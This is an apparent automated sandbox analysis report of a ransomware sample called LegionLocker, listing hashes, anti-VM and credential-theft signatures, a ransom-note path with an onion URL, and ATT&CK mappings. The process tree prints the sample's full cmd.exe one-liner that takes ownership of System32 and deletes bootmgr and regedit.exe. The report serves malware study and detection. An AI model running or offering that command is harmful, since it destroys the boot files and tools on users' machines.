Analysis
-
max time kernel
140s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
05-11-2024 12:23
Behavioral task
behavioral1
Sample
Ransomware LegionLocker.exe
Resource
win7-20240708-en
General
-
Target
Ransomware LegionLocker.exe
-
Size
3.1MB
-
MD5
6a85d0ba4d1db63d390b7a071d60e0ef
-
SHA1
79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
-
SHA256
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
-
SHA512
16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
-
SSDEEP
49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT
http://mail2tor2zyjdctd.onion/
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Ransomware LegionLocker.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Ransomware LegionLocker.exe -
Renames multiple (153) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 2220 takeown.exe 2284 icacls.exe 588 takeown.exe 636 icacls.exe 844 takeown.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Ransomware LegionLocker.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ransomware LegionLocker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ransomware LegionLocker.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 2220 takeown.exe 2284 icacls.exe 588 takeown.exe 636 icacls.exe 844 takeown.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/1724-28-0x0000000000F60000-0x0000000001790000-memory.dmp themida behavioral1/memory/1724-29-0x0000000000F60000-0x0000000001790000-memory.dmp themida -
Processes:
Ransomware LegionLocker.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ransomware LegionLocker.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Ransomware LegionLocker.exepid process 1724 Ransomware LegionLocker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Ransomware LegionLocker.execmd.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ransomware LegionLocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
Ransomware LegionLocker.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 1724 Ransomware LegionLocker.exe Token: SeDebugPrivilege 1724 Ransomware LegionLocker.exe Token: SeTakeOwnershipPrivilege 2220 takeown.exe Token: SeTakeOwnershipPrivilege 588 takeown.exe Token: SeTakeOwnershipPrivilege 844 takeown.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
Ransomware LegionLocker.execmd.exedescription pid process target process PID 1724 wrote to memory of 1908 1724 Ransomware LegionLocker.exe cmd.exe PID 1724 wrote to memory of 1908 1724 Ransomware LegionLocker.exe cmd.exe PID 1724 wrote to memory of 1908 1724 Ransomware LegionLocker.exe cmd.exe PID 1724 wrote to memory of 1908 1724 Ransomware LegionLocker.exe cmd.exe PID 1908 wrote to memory of 2220 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 2220 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 2220 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 2220 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 2284 1908 cmd.exe icacls.exe PID 1908 wrote to memory of 2284 1908 cmd.exe icacls.exe PID 1908 wrote to memory of 2284 1908 cmd.exe icacls.exe PID 1908 wrote to memory of 2284 1908 cmd.exe icacls.exe PID 1908 wrote to memory of 588 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 588 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 588 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 588 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 636 1908 cmd.exe icacls.exe PID 1908 wrote to memory of 636 1908 cmd.exe icacls.exe PID 1908 wrote to memory of 636 1908 cmd.exe icacls.exe PID 1908 wrote to memory of 636 1908 cmd.exe icacls.exe PID 1908 wrote to memory of 844 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 844 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 844 1908 cmd.exe takeown.exe PID 1908 wrote to memory of 844 1908 cmd.exe takeown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2220 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2284 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:588 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:636 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:844
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f2bbb85d6112bd7360a4ddbc23ea9a8b
SHA1683eb7b2b0a5904337f204f71d25c02b9cc5daba
SHA256be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
SHA512a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172
-
Filesize
16B
MD52caa6f3c95f6ec6bba5b54344938efa0
SHA12d5637f50e858fbaaeec7853d944dd3c3e91ec39
SHA25616ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
SHA5124141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00
-
Filesize
11KB
MD598320b7eb431a4d989a4cd3031e723b9
SHA17b59bc263c75bf899d4302d236b1c3806d87e3d1
SHA2566591551d4d97286fb4d1af05cf82289fe0ef690b46c52e88458cf1d8d8ef580b
SHA51227487d804f4162ef39bd0bdeccfe6b927b40ee2fea612af35982ff72a37ce823651d04a0037814fd63b3e71c28082196f2f3d31eb916e3bef6cf937804db9167